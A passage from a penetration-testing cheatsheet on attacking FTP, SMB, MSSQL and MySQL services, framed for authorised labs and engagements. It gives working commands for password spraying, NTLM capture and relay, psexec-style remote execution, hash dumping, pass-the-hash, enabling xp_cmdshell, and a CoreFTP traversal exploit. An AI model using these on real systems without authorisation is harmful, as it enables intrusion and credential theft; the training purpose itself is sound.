daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

network-service-attack-manual.md (55602B)


      1 ---
      2 title: "Network Service Attack Manual"
      3 description: "Long-form operator guide to service discovery, normal client interaction, misconfiguration review, credential reuse, FTP, SMB, MySQL, MSSQL, RDP, DNS, SMTP, POP3, IMAP, multi-service attack chains, evidence handling, and cleanup."
      4 category: pentest-workflow
      5 subcategory: "Companion Guides"
      6 order: 23
      7 tags: ["htb", "cpts", "network-services", "service-enumeration", "ftp", "smb", "mysql", "mssql", "rdp", "dns", "smtp", "pop3", "imap", "password-spraying", "credential-reuse", "pentest-workflow"]
      8 tools: ["nmap", "smbclient / smbmap / rpcclient / enum4linux-ng", "NetExec", "Impacket", "Responder", "hashcat", "Medusa / Hydra / Crowbar", "mysql / sqsh / sqlcmd", "FreeRDP", "dig / host / fierce", "smtp-user-enum / swaks / o365spray"]
      9 difficulty: intermediate
     10 updated: "2026-09-15"
     11 source: "vault:HackTheBox/Academy/CPTS Path/11-Attacking-Common-Services"
     12 ---
     13 
     14 [Condensed service card](/sheets/pentest-workflow/attacking-common-services-guide) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Service-enumeration stage](/sheets/pentest-workflow/service-enumeration)
     15 
     16 # Network Service Attack Manual `fas:ClipboardList`
     17 
     18 > [!dashboard] Field-manual scope
     19 > This is the long-form companion to the [condensed service card](/sheets/pentest-workflow/attacking-common-services-guide). It turns the source module into one operator workflow: establish normal access, classify the service, test the cheapest misconfigurations first, validate credentials carefully, and follow every item of loot into the next exposed service.
     20 
     21 FTP, SMB, database engines, RDP, DNS, and mail rarely fail in isolation. An anonymous file share supplies a username. That username confirms a mailbox. A message exposes a database password. The database account can read a configuration file or start a process. The useful unit of work is therefore the chain, not the port.
     22 
     23 > [!danger] Authorised targets only
     24 > The commands below include password spraying, NTLM capture and relay, remote command execution, file writes, session access, mail relay, and old memory-corruption exploits. Use them only in an HTB lab or an engagement that explicitly permits the technique.
     25 >
     26 > On a live engagement, confirm lockout policy before any credential attack, prove impact with the least invasive action available, record every changed setting and dropped file, and restore the target during cleanup. BlueKeep and SMBGhost testing can crash a host. Get separate approval before exploitation.
     27 
     28 ## 1 · Build the service map `fas:Terminal`
     29 
     30 Set target data once. A wrong realm, hostname, or listener address causes enough false negatives that these variables are part of the test, not mere convenience.
     31 
     32 ```bash
     33 export IP="10.10.10.10"
     34 export TARGET="files01.example.test"
     35 export DOMAIN="example.test"
     36 export DC="dc01.$DOMAIN"
     37 export DCIP="10.10.10.5"
     38 export LHOST="10.10.14.2"
     39 export U="operator"
     40 export P="<secret>"
     41 export EVIDENCE="evidence/$IP"
     42 mkdir -p "$EVIDENCE"
     43 ```
     44 
     45 > [!warning] Keep secrets out of the evidence directory
     46 > Store passwords and hashes in the engagement's approved secret store. Tool output often echoes credentials. Redact it before copying a transcript into the report bundle.
     47 
     48 Run a fast discovery pass, then a version and script pass against the ports that answered. Add an all-TCP sweep when scope and timing permit. Internal test systems often move management services away from their defaults.
     49 
     50 ```bash
     51 # Fast port inventory
     52 sudo nmap -Pn -n --top-ports 1000 --open -oA "$EVIDENCE/tcp-top" "$IP"
     53 
     54 # All TCP ports; reduce -T4 on fragile or rate-limited networks
     55 sudo nmap -Pn -n -p- -T4 --open -oA "$EVIDENCE/tcp-all" "$IP"
     56 
     57 # Focused service scan after extracting open ports
     58 sudo nmap -Pn -n -sV -sC \
     59   -p21,25,53,110,139,143,445,465,587,993,995,1433,3306,3389 \
     60   -oA "$EVIDENCE/common-services" "$IP"
     61 
     62 # UDP matters for DNS; scan it explicitly
     63 sudo nmap -Pn -n -sU -sV -p53 -oA "$EVIDENCE/udp-services" "$IP"
     64 ```
     65 
     66 ### Port and protocol triage
     67 
     68 | Service | Default port(s) | First unauthenticated checks | Authenticated payoff |
     69 |---|---:|---|---|
     70 | FTP | TCP 21 | banner, `ftp-anon`, directory listing, write test | file read/write, webroot access, bounce scan |
     71 | SMB | TCP 445, 139; UDP 137-138 | dialect, signing, null/guest shares, RPC | share loot, host/user enum, remote admin, hash dump |
     72 | MSSQL | TCP 1433; UDP 1434 | version, hostname/domain, instance discovery | data, file read, impersonation, linked servers, OS execution |
     73 | MySQL | TCP 3306 | version and handshake | data, `FILE` primitives, UDF path where applicable |
     74 | RDP | TCP 3389 | NTLM identity, TLS certificate, NLA/encryption | desktop, redirected drive, admin session operations |
     75 | DNS | UDP/TCP 53 | recursion, records, nameserver list, AXFR | authenticated administration is out of scope for this module |
     76 | SMTP | TCP 25, 465, 587 | banner, verbs, user disclosure, relay test | sending and mailbox/account discovery |
     77 | POP3 | TCP 110, 995 | banner, TLS, username response differences | mailbox download |
     78 | IMAP | TCP 143, 993 | banner, capabilities, TLS | mailbox browsing and search |
     79 
     80 > [!tip] Interpret the whole response
     81 > A certificate subject can disclose a host or domain. An NTLM challenge can disclose the NetBIOS domain. An SMTP banner may name the mail product. SMB signing status determines whether an NTLM relay path is plausible. Save those details before authentication changes what the service returns.
     82 
     83 ## 2 · Model the attack path
     84 
     85 The source module uses four questions for any vulnerability. This guide renames them as an operator worksheet:
     86 
     87 1. **Entry:** Which field, file, protocol message, library, API, or configuration value can you influence?
     88 2. **Handler:** Which parser, function, service component, or business rule consumes it, and what assumption can fail?
     89 3. **Security context:** Which operating-system account, database role, group, policy, or container identity runs the handler?
     90 4. **Effect:** Does the result reach a local file, local process, database row, another host, or an outbound connection?
     91 
     92 <figure class="flow plate corners">
     93   <figcaption class="flow__cap"><span class="flow__kind">Attack path model</span><span class="flow__dir">LR</span></figcaption>
     94   <div class="flow__body">
     95     <svg class="flow-svg" viewBox="0 0 1080 200" role="img" aria-label="Entry to handler to security context to effect, with the effect feeding a second cycle back to entry">
     96       <path class="fedge" d="M255,82 L293,82" marker-end="url(#flow-arrow)" />
     97       <path class="fedge" d="M515,82 L553,82" marker-end="url(#flow-arrow)" />
     98       <path class="fedge" d="M775,82 L813,82" marker-end="url(#flow-arrow)" />
     99       <path class="fedge is-back" d="M925,106 L925,172 L145,172 L145,108" marker-end="url(#flow-arrow)" />
    100       <g class="fnode is-entry"><rect class="fnode__box" x="35" y="58" width="220" height="48" /><text class="fnode__label" x="145" y="79" text-anchor="middle">Entry<tspan class="sub" x="145" dy="15">input, file, config, library</tspan></text></g>
    101       <g class="fnode"><rect class="fnode__box" x="295" y="58" width="220" height="48" /><text class="fnode__label" x="405" y="79" text-anchor="middle">Handler<tspan class="sub" x="405" dy="15">parser, function, service logic</tspan></text></g>
    102       <g class="fnode"><rect class="fnode__box" x="555" y="58" width="220" height="48" /><text class="fnode__label" x="665" y="79" text-anchor="middle">Security context<tspan class="sub" x="665" dy="15">account, group, role, policy</tspan></text></g>
    103       <g class="fnode"><rect class="fnode__box" x="815" y="58" width="220" height="48" /><text class="fnode__label" x="925" y="79" text-anchor="middle">Effect<tspan class="sub" x="925" dy="15">file, process, data, network</tspan></text></g>
    104       <g class="felabel"><rect class="felabel__box" x="463" y="164" width="144" height="16" /><text class="felabel__text" x="535" y="175" text-anchor="middle">feeds a second cycle</text></g>
    105     </svg>
    106   </div>
    107 </figure>
    108 
    109 Most exploit chains contain two passes through this model. The first discloses data or creates a foothold. Its output becomes the entry for the second pass, which reaches code execution or a more privileged identity.
    110 
    111 ### Worked model: Log4Shell
    112 
    113 | Cycle | Entry | Handler | Security context | Effect |
    114 |---|---|---|---|---|
    115 | Initiation | A crafted string reaches a logged value such as an HTTP header | A vulnerable Log4j version interprets the lookup instead of recording plain text | The Java application's account | An outbound lookup to attacker-controlled infrastructure |
    116 | Trigger | The returned remote content becomes new input | The application loads or executes it | The same application account | Code execution and an outbound session |
    117 
    118 The model keeps version research tied to impact. A remotely reachable parser bug in a low-privilege sandbox and the same bug in a root-owned daemon do not have the same result. Record the handler and security context before assigning severity.
    119 
    120 ## 3 · Work like a legitimate client first `fas:Terminal`
    121 
    122 Normal interaction exposes permissions, object names, response codes, and protocol behavior that scanners often flatten. Learn the client's verbs before testing abuse.
    123 
    124 ### SMB from Windows command prompt
    125 
    126 ```batch
    127 :: One-off UNC browse
    128 dir \\%IP%\Finance\
    129 
    130 :: Map a share with an explicit account
    131 net use N: \\%IP%\Finance /user:EXAMPLE\operator *
    132 
    133 :: Inventory, filename search, and content search
    134 dir N: /a-d /s /b | find /c ":\"
    135 dir N:\*cred* /s /b
    136 findstr /s /i /m "password secret token key connection" N:\*.*
    137 
    138 :: Disconnect after collection
    139 net use N: /delete
    140 ```
    141 
    142 Passing `*` makes `net use` prompt for the password. This keeps the secret out of the command line. Count files before recursive content searches so a large share does not turn into an uncontrolled collection job.
    143 
    144 ### SMB from PowerShell
    145 
    146 ```powershell
    147 $cred = Get-Credential 'EXAMPLE\operator'
    148 New-PSDrive -Name N -Root '\\10.10.10.10\Finance' -PSProvider FileSystem -Credential $cred
    149 
    150 (Get-ChildItem N:\ -File -Recurse -ErrorAction SilentlyContinue | Measure-Object).Count
    151 Get-ChildItem N:\ -File -Recurse -Include '*cred*','*.config','*.ini','*.kdbx','*.ps1','*.xml'
    152 Get-ChildItem N:\ -File -Recurse -ErrorAction SilentlyContinue |
    153   Select-String -Pattern 'password|secret|token|connection string' -List
    154 
    155 Remove-PSDrive N
    156 ```
    157 
    158 `Get-ChildItem` emits objects, so size, extension, timestamp, and path filters can be applied before `Select-String`. That matters on production shares where blindly opening every file is slow and noisy.
    159 
    160 ### SMB from Linux
    161 
    162 ```bash
    163 # Interactive client; -N attempts a null session
    164 smbclient -N -L "//$IP"
    165 smbclient "//$IP/Finance" -U 'EXAMPLE/operator'
    166 
    167 # Mount with a protected credentials file
    168 sudo mkdir -p /mnt/finance
    169 chmod 600 /tmp/finance.creds
    170 sudo mount -t cifs "//$IP/Finance" /mnt/finance \
    171   -o credentials=/tmp/finance.creds,ro
    172 
    173 find /mnt/finance -type f \( -iname '*cred*' -o -iname '*.config' -o -iname '*.ini' -o -iname '*.kdbx' \)
    174 grep -RIniE 'password|secret|token|connection.?string' /mnt/finance 2>/dev/null
    175 
    176 sudo umount /mnt/finance
    177 ```
    178 
    179 The credentials file uses three lines: `username=operator`, `password=<secret>`, and `domain=EXAMPLE`. Start with a read-only mount. Remount read-write only when scope permits modification and a write primitive matters to the finding.
    180 
    181 ### Database clients
    182 
    183 ```bash
    184 # MySQL prompts for the password
    185 mysql -h "$IP" -u "$U" -p
    186 
    187 # MSSQL with SQL authentication
    188 sqsh -S "$IP" -U "$U" -P "$P"
    189 
    190 # Impacket supports password, NTLM hash, and Kerberos workflows
    191 impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth
    192 impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth -hashes ":<NT_HASH>"
    193 impacket-mssqlclient -k -no-pass "$DOMAIN/$U@$TARGET"
    194 ```
    195 
    196 On Windows, use `sqlcmd` for MSSQL and `mysql.exe` for MySQL. DBeaver is useful when the engagement allows a GUI and you need to inspect several database engines, but capture the executed SQL separately so the work remains reproducible.
    197 
    198 ### Mail clients
    199 
    200 Once credentials work, an IMAP-capable client such as Evolution can search headers, bodies, and attachments more reliably than a raw socket session. Record server, port, TLS mode, and authentication method. Avoid synchronising an entire mailbox when a scoped server-side search will answer the question.
    201 
    202 ## 4 · Test configuration before exploits
    203 
    204 The same four configuration failures recur across all of these protocols:
    205 
    206 | Failure | What to test | Evidence to retain | Typical impact |
    207 |---|---|---|---|
    208 | Factory or weak credentials | vendor defaults, blank passwords, predictable test accounts, approved spray candidates | product/version, exact account class, accepted auth path | unauthorised service access |
    209 | Anonymous or guest access | FTP anonymous, SMB null/guest, exposed mail verbs | listing or read-only object that proves access | data disclosure or write access |
    210 | Excessive rights | share ACL, database role, service account, impersonation grant | effective permissions and a minimal read/write/execute proof | lateral movement or code execution |
    211 | Unneeded defaults | samples, debug endpoints, legacy protocols, open relay, exposed admin interfaces | banner, response, configuration state | enlarged attack surface |
    212 
    213 ### Credential attack order
    214 
    215 1. Attempt anonymous, null, or guest access where the protocol supports it.
    216 2. Check a small, product-specific default list against the exact fingerprint.
    217 3. Test credentials recovered from the target against the service that exposed them.
    218 4. Reuse confirmed credentials across the other in-scope services and hosts.
    219 5. Spray one approved password across a known user list, then wait for the interval in the rules of engagement.
    220 6. Run a per-account wordlist only in a lab or when the lockout and availability risk is explicitly accepted.
    221 
    222 > [!warning] Lockout control
    223 > Discover domain and local account policies before spraying. A single host can validate both domain and local users, and `--local-auth` changes which account database NetExec targets. Count attempts per identity across every protocol; lockout counters may be shared by SMB, RDP, mail, and web authentication.
    224 
    225 ### Evidence loop
    226 
    227 | Phase | Operator question | Minimal proof |
    228 |---|---|---|
    229 | Discovery | What answered and what identity did it disclose? | scan and banner |
    230 | Exposure | What is visible without a credential? | share, record, capability, or directory name |
    231 | Authentication | Which account and realm worked? | successful login without recording the secret |
    232 | Authorisation | What can that identity read, write, or execute? | a harmless query, listing, or test artefact |
    233 | Propagation | Which new host, user, or secret should be tested next? | entry in the target/credential matrix |
    234 
    235 ## 5 · Turn loot into a credential graph `fas:MagnifyingGlass`
    236 
    237 Strings that look trivial can connect two services. Treat filenames, mailbox senders, database owners, document metadata, scheduled-task paths, and share comments as candidate identities.
    238 
    239 ```bash
    240 # Search a collected directory without printing binary bodies
    241 find loot -type f -printf '%TY-%Tm-%Td %TH:%TM\t%s\t%p\n' | sort
    242 rg -n -i --hidden \
    243   -g '!*.jpg' -g '!*.png' -g '!*.gif' -g '!*.pdf' \
    244   'pass(word)?|secret|token|api.?key|connection.?string|user(name)?|server=' loot
    245 
    246 # Useful file classes
    247 find loot -type f \( \
    248   -iname '*.config' -o -iname '*.ini' -o -iname '*.xml' -o \
    249   -iname '*.yml' -o -iname '*.yaml' -o -iname '*.ps1' -o \
    250   -iname '*.kdbx' -o -iname '*.pem' -o -iname 'id_rsa*' \
    251 \) -print
    252 ```
    253 
    254 Maintain two small tables during the engagement.
    255 
    256 | Identity | Source | Realm | Valid services | Privilege | Last test |
    257 |---|---|---|---|---|---|
    258 | `jsmith` | anonymous FTP filename | unknown | pending | unknown | timestamp |
    259 
    260 | Host | Service | Product/version | Anonymous result | Auth result | Follow-up |
    261 |---|---|---|---|---|---|
    262 | `files01` | SMB/445 | Samba 4.x | read on `public` | pending | inspect documents |
    263 
    264 The source module's representative chain starts with an anonymous FTP filename that resembles a username. The same string fails on FTP as a password, works against mail, leads to database credentials in a message, and ends at MSSQL command execution. The first failed login did not invalidate the candidate. It only invalidated one identity-secret-service combination.
    265 
    266 ## 6 · FTP operations `fas:Terminal`
    267 
    268 FTP separates its control and data channels. Active mode asks the server to connect back to the client; passive mode has the client initiate both connections. Firewalls, NAT, and proxies often make passive mode more reliable. Standard FTP transmits credentials and content in clear text. FTPS adds TLS; SFTP is an SSH subsystem and is a different protocol.
    269 
    270 ### Discover and browse
    271 
    272 ```bash
    273 sudo nmap -Pn -n -sV -sC -p21 \
    274   --script ftp-anon,ftp-syst,ftp-bounce \
    275   -oA "$EVIDENCE/ftp" "$IP"
    276 
    277 ftp "$IP"
    278 # Name: anonymous
    279 # Password: blank or an arbitrary email-shaped string
    280 ```
    281 
    282 Useful interactive commands:
    283 
    284 ```text
    285 status                 show connection and transfer settings
    286 passive                toggle passive mode
    287 binary                 protect archives, databases, images, and executables
    288 ls / dir               list the current directory
    289 pwd / cd / lcd         remote path, remote change, local change
    290 get / mget             download one or many files
    291 put / mput              upload one or many files
    292 size / mdtm            inspect size and modification time where supported
    293 ```
    294 
    295 > [!tip] Switch to binary mode before collection
    296 > ASCII mode rewrites line endings and can corrupt archives, databases, KeePass files, and executables. Use `binary` before `get` unless the object is known to be plain text.
    297 
    298 ### Validate read and write permissions
    299 
    300 ```bash
    301 # lftp is easier to script and can mirror read-only content
    302 lftp -u anonymous, "ftp://$IP"
    303 
    304 # Inside the client, create a harmless marker only when write testing is allowed
    305 put ftp-write-proof.txt
    306 ls
    307 delete ftp-write-proof.txt
    308 ```
    309 
    310 If FTP maps to a webroot, verify the mapping with a harmless text file and an HTTP GET before discussing a server-side script. Record the exact remote path, URL, owner, and cleanup action.
    311 
    312 ### Credential testing
    313 
    314 ```bash
    315 medusa -h "$IP" -M ftp -u "$U" -P approved-passwords.txt -f
    316 hydra -L users.txt -p 'ApprovedCandidate!' "ftp://$IP"
    317 ```
    318 
    319 `medusa -f` stops after the first success for the host. Rate and concurrency still need to match the rules of engagement.
    320 
    321 ### FTP bounce
    322 
    323 An FTP server that accepts an arbitrary `PORT` destination can scan a network it can reach. Modern daemons usually block this.
    324 
    325 ```bash
    326 nmap -Pn -n -v -p80,443 \
    327   -b 'anonymous:guest@ftp-gateway.example.test' \
    328   172.17.0.2
    329 ```
    330 
    331 A positive result proves a network pivot and should be captured even if no open port is found. It shows that the server accepted a third-party data connection.
    332 
    333 ### CoreFTP path traversal, CVE-2022-22836
    334 
    335 Affected CoreFTP builds mishandled traversal in the HTTP PUT path. The write occurs with the service account's filesystem rights.
    336 
    337 ```bash
    338 curl -k --path-as-is -X PUT \
    339   --basic -u '<user>:<password>' \
    340   -H "Host: $IP" \
    341   --data-binary 'authorised proof' \
    342   "https://$IP/../../../../../../write-proof.txt"
    343 ```
    344 
    345 Use a harmless destination agreed in advance, confirm its contents, then delete it. `--path-as-is` prevents curl from normalising the traversal before transmission.
    346 
    347 ### FTP decision record
    348 
    349 | Observation | Meaning | Next action |
    350 |---|---|---|
    351 | Anonymous listing succeeds | unauthenticated disclosure | collect filenames and scoped files |
    352 | Directory is writable | integrity impact | test harmless marker and map backing path |
    353 | Web server exposes the same path | possible server-side execution | identify accepted script type; get approval before upload |
    354 | `PORT` accepts a third-party host | bounce/pivot path | scan only approved internal targets |
    355 | Exact vulnerable CoreFTP build | version-gated file write | validate with a removable text file |
    356 
    357 ## 7 · SMB and Windows file services `fas:Terminal`
    358 
    359 SMB carries file, printer, named-pipe, and remote-administration traffic. TCP/445 is direct-hosted SMB; TCP/139 is the older NetBIOS transport. Samba implements SMB on Unix-like systems. Share access and host administration are separate questions: a user can read a share without being a local administrator.
    360 
    361 ### Fingerprint dialect, identity, and signing
    362 
    363 ```bash
    364 sudo nmap -Pn -n -sV -sC -p139,445 \
    365   --script smb-protocols,smb2-security-mode,smb2-time,smb2-capabilities \
    366   -oA "$EVIDENCE/smb" "$IP"
    367 
    368 nxc smb "$IP"
    369 ```
    370 
    371 Record the hostname, domain/workgroup, SMB dialect, signing requirement, and time. Clock data helps diagnose Kerberos failures later. SMB signing set to optional or disabled is one prerequisite for relay to SMB; it does not prove that authentication can be coerced or that the relayed identity will have useful rights.
    372 
    373 ### Null, guest, and share enumeration
    374 
    375 ```bash
    376 smbclient -N -L "//$IP"
    377 smbmap -H "$IP"
    378 
    379 # Explicit guest and known-user checks
    380 smbclient -L "//$IP" -U 'guest%'
    381 smbclient -L "//$IP" -U "$DOMAIN/$U"
    382 
    383 # Browse and transfer
    384 smbclient "//$IP/public" -N
    385 smbmap -H "$IP" -r public
    386 smbmap -H "$IP" --download 'public\readme.txt'
    387 ```
    388 
    389 Within `smbclient`, use `recurse ON`, `prompt OFF`, and `mget *` only after reviewing the collection scope and share size. Prefer selective retrieval for evidence.
    390 
    391 ### RPC and identity enumeration
    392 
    393 ```bash
    394 rpcclient -U '%' "$IP"
    395 # enumdomusers
    396 # enumdomgroups
    397 # querydispinfo
    398 # getdompwinfo
    399 # netshareenumall
    400 
    401 enum4linux-ng -A -C "$IP"
    402 ```
    403 
    404 `-U '%'` supplies an empty username and password. A successful RPC null session can expose users, groups, password policy, share names, and RIDs even when file shares reject anonymous access.
    405 
    406 ### Permission and write tests
    407 
    408 ```bash
    409 smbmap -H "$IP" -u "$U" -p "$P"
    410 smbmap -H "$IP" -u "$U" -p "$P" -r Finance
    411 
    412 # Upload a non-executable marker, verify it, and remove it
    413 printf 'authorised write proof\n' > /tmp/smb-write-proof.txt
    414 smbmap -H "$IP" -u "$U" -p "$P" \
    415   --upload /tmp/smb-write-proof.txt 'Finance\smb-write-proof.txt'
    416 smbmap -H "$IP" -u "$U" -p "$P" \
    417   --download 'Finance\smb-write-proof.txt'
    418 ```
    419 
    420 Delete the remote marker through an interactive client after capture. Do not use a web shell as the first write proof.
    421 
    422 ### Password spraying with NetExec
    423 
    424 ```bash
    425 # Domain accounts
    426 nxc smb targets.txt -d "$DOMAIN" -u users.txt -p 'ApprovedCandidate!' \
    427   --continue-on-success
    428 
    429 # Local accounts; changes the authentication realm per host
    430 nxc smb targets.txt -u users.txt -p 'ApprovedCandidate!' \
    431   --local-auth --continue-on-success
    432 ```
    433 
    434 `Pwn3d!` in NetExec output means the account has administrative rights on that host under the tested protocol. A plain success still matters for shares, RPC, and credential reuse.
    435 
    436 ### Remote execution choices
    437 
    438 Use these only after confirming administrative rights and approval for code execution.
    439 
    440 ```bash
    441 # Service creation plus ADMIN$ upload; commonly returns SYSTEM
    442 impacket-psexec "$DOMAIN/administrator@$IP"
    443 
    444 # Service-based semi-interactive execution without the PsExec service binary
    445 impacket-smbexec "$DOMAIN/administrator@$IP"
    446 
    447 # Task Scheduler execution
    448 impacket-atexec "$DOMAIN/administrator@$IP" 'whoami && hostname'
    449 
    450 # NetExec command fan-out; -x is cmd.exe, -X is PowerShell
    451 nxc smb "$IP" -d "$DOMAIN" -u administrator -p "$P" \
    452   -x 'whoami && hostname' --exec-method smbexec
    453 ```
    454 
    455 Execution methods produce different artefacts. PsExec uploads a binary and creates a service. SMBExec creates a temporary service and redirects output through SMB. AtExec creates a scheduled task. Select the method whose changes you can account for and clean up.
    456 
    457 ### Local account hashes and pass-the-hash
    458 
    459 ```bash
    460 # Administrative access required
    461 nxc smb "$IP" -u administrator -p "$P" --sam
    462 impacket-secretsdump "administrator@$IP"
    463 
    464 # Reuse the NT hash without recovering the plaintext
    465 nxc smb "$IP" -u Administrator -H '<NT_HASH>' --local-auth
    466 impacket-psexec -hashes ':<NT_HASH>' "Administrator@$IP"
    467 ```
    468 
    469 An NT hash is an authentication secret. Store and report it like a password. The empty LM half in `-hashes ':<NT_HASH>'` is intentional.
    470 
    471 ### Logged-on users
    472 
    473 ```bash
    474 nxc smb '10.10.110.0/24' -d "$DOMAIN" -u "$U" -p "$P" --loggedon-users
    475 ```
    476 
    477 This identifies where high-value identities have active sessions. It is host enumeration, not proof that their credentials can be extracted. State the distinction in the report.
    478 
    479 ### NetNTLM capture and relay
    480 
    481 Responder answers local name-resolution broadcasts such as LLMNR and NBT-NS. A client that requests a nonexistent name may authenticate to the attack host, which yields NetNTLM challenge-response material.
    482 
    483 ```bash
    484 sudo responder -I tun0
    485 hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt
    486 ```
    487 
    488 For relay, disable Responder's SMB and HTTP listeners so `ntlmrelayx` can bind them, build a target list whose SMB signing is not required, and wait for or trigger an in-scope authentication event.
    489 
    490 ```bash
    491 nxc smb targets.txt --gen-relay-list relayable.txt
    492 sudo impacket-ntlmrelayx --no-http-server -smb2support -tf relayable.txt
    493 ```
    494 
    495 Relay requires all of the following:
    496 
    497 1. The victim must authenticate to the relay listener.
    498 2. The destination must accept the chosen NTLM relay path. For SMB, message signing cannot be required.
    499 3. The relayed identity must have permission to perform the demonstrated action.
    500 4. The destination must differ where protocol protections prevent reflection to the same service.
    501 
    502 Capture, crack, and relay are different findings. A captured NetNTLMv2 response is not an NT hash and cannot be used directly for standard pass-the-hash.
    503 
    504 ### SMBGhost, CVE-2020-0796
    505 
    506 SMBGhost affected SMBv3.1.1 compression handling in specific Windows 10 and Windows Server builds. The kernel-level bug can crash the target. Confirm the OS build and patch state with a scanner before considering exploitation. A version banner alone is insufficient evidence of exploitability.
    507 
    508 ### SMB decision record
    509 
    510 | Observation | Finding | Required follow-up |
    511 |---|---|---|
    512 | Null/guest share access | unauthenticated exposure | document readable and writable paths |
    513 | Signing not required | relay prerequisite | find an auth source and test target-side rights |
    514 | Valid non-admin credential | authenticated SMB access | enumerate shares, RPC, and reuse boundaries |
    515 | Admin-equivalent credential | remote administration | choose a minimal execution or secrets proof |
    516 | SAM dump | local credential compromise | test scope-limited reuse; avoid assuming domain impact |
    517 
    518 ## 8 · SQL Server and MySQL `fas:Terminal`
    519 
    520 Databases concentrate business data, application secrets, and trusted links. Separate database privilege from operating-system privilege. A SQL `sysadmin` can usually reach OS execution on MSSQL, but the process runs as the SQL Server service account. A MySQL user with `FILE` can read or write only where both MySQL policy and filesystem permissions allow it.
    521 
    522 ### Discovery and connection
    523 
    524 ```bash
    525 sudo nmap -Pn -n -sV -sC -p1433,3306 \
    526   --script ms-sql-info,ms-sql-ntlm-info,mysql-info \
    527   -oA "$EVIDENCE/sql" "$IP"
    528 
    529 mysql -h "$IP" -u "$U" -p
    530 sqsh -S "$IP" -U '.\local_sql_user' -P "$P" -h
    531 impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth
    532 ```
    533 
    534 MSSQL commonly uses TCP/1433 and the SQL Browser on UDP/1434, but named instances can listen elsewhere. MySQL uses TCP/3306 by default. MSSQL may use Windows-only authentication or mixed mode, which also accepts SQL-native accounts.
    535 
    536 ### Engine inventory
    537 
    538 ```sql
    539 -- MySQL
    540 SELECT VERSION(), USER(), CURRENT_USER();
    541 SHOW DATABASES;
    542 SELECT user, host FROM mysql.user;
    543 USE application_db;
    544 SHOW TABLES;
    545 SHOW COLUMNS FROM users;
    546 SELECT * FROM users LIMIT 20;
    547 ```
    548 
    549 ```sql
    550 -- MSSQL; GO terminates a batch in sqlcmd/sqsh
    551 SELECT @@SERVERNAME, @@VERSION, SYSTEM_USER, USER_NAME();
    552 GO
    553 SELECT name FROM master.dbo.sysdatabases;
    554 GO
    555 SELECT name, type_desc FROM sys.server_principals;
    556 GO
    557 SELECT table_schema, table_name FROM application_db.INFORMATION_SCHEMA.TABLES;
    558 GO
    559 ```
    560 
    561 Inventory schemas and column names before selecting rows. Limit output, avoid bulk PII collection, and record why each table was queried.
    562 
    563 ### MSSQL role and permission checks
    564 
    565 ```sql
    566 SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
    567 GO
    568 SELECT * FROM fn_my_permissions(NULL, 'SERVER');
    569 GO
    570 SELECT permission_name, state_desc
    571 FROM sys.server_permissions
    572 WHERE grantee_principal_id = SUSER_ID();
    573 GO
    574 ```
    575 
    576 ### MSSQL impersonation
    577 
    578 ```sql
    579 SELECT DISTINCT grantor.name AS impersonatable_login
    580 FROM sys.server_permissions AS perm
    581 JOIN sys.server_principals AS grantor
    582   ON perm.major_id = grantor.principal_id
    583 WHERE perm.permission_name = 'IMPERSONATE'
    584   AND perm.grantee_principal_id = SUSER_ID();
    585 GO
    586 
    587 USE master;
    588 GO
    589 EXECUTE AS LOGIN = 'sa';
    590 GO
    591 SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
    592 GO
    593 REVERT;
    594 GO
    595 ```
    596 
    597 Check `SYSTEM_USER` and `IS_SRVROLEMEMBER` after every context switch. `REVERT` returns to the original login. Do not assume that permission to impersonate one principal leads to `sysadmin`; prove the role chain.
    598 
    599 ### MSSQL operating-system execution
    600 
    601 ```sql
    602 EXEC master..xp_cmdshell 'whoami';
    603 GO
    604 ```
    605 
    606 If `xp_cmdshell` is disabled and the account is `sysadmin`, record the original state before changing it:
    607 
    608 ```sql
    609 EXEC sp_configure 'show advanced options';
    610 GO
    611 EXEC sp_configure 'xp_cmdshell';
    612 GO
    613 
    614 EXEC sp_configure 'show advanced options', 1;
    615 RECONFIGURE;
    616 EXEC sp_configure 'xp_cmdshell', 1;
    617 RECONFIGURE;
    618 GO
    619 
    620 EXEC master..xp_cmdshell 'whoami && hostname';
    621 GO
    622 
    623 -- Restore the original values after validation
    624 EXEC sp_configure 'xp_cmdshell', 0;
    625 RECONFIGURE;
    626 EXEC sp_configure 'show advanced options', 0;
    627 RECONFIGURE;
    628 GO
    629 ```
    630 
    631 `xp_cmdshell` runs synchronously under the SQL Server service account or its configured proxy. Long commands can hold the database connection open. Use short identity and hostname checks as proof.
    632 
    633 ### File reads and writes
    634 
    635 ```sql
    636 -- MySQL policy gate
    637 SHOW VARIABLES LIKE 'secure_file_priv';
    638 SHOW GRANTS FOR CURRENT_USER();
    639 
    640 -- Read requires FILE and filesystem access
    641 SELECT LOAD_FILE('/etc/hosts');
    642 
    643 -- Write refuses to overwrite an existing file
    644 SELECT 'authorised proof'
    645 INTO OUTFILE '/var/lib/mysql-files/write-proof.txt';
    646 ```
    647 
    648 `secure_file_priv` set to a directory restricts file operations to that directory. An empty value permits unrestricted paths subject to filesystem rights. `NULL` disables these operations.
    649 
    650 ```sql
    651 -- MSSQL read under the service account
    652 SELECT BulkColumn
    653 FROM OPENROWSET(
    654   BULK N'C:\Windows\System32\drivers\etc\hosts',
    655   SINGLE_CLOB
    656 ) AS contents;
    657 GO
    658 ```
    659 
    660 MSSQL file writes through OLE Automation require administrative configuration changes. Prefer `xp_cmdshell` with a removable text marker when command execution is already approved. If OLE Automation itself is the finding, capture its original state and restore it.
    661 
    662 ### Linked-server movement
    663 
    664 ```sql
    665 EXEC master.dbo.sp_linkedservers;
    666 GO
    667 SELECT name, product, provider, data_source, is_linked
    668 FROM sys.servers;
    669 GO
    670 
    671 EXEC ('SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')')
    672 AT [SQL02\SQLEXPRESS];
    673 GO
    674 ```
    675 
    676 A link uses the mapping configured on the first server. Its effective identity can be weaker or stronger than the current login. Enumerate each hop and avoid claiming control of the linked host until the remote query proves the context.
    677 
    678 ### Coerce the SQL service account to authenticate
    679 
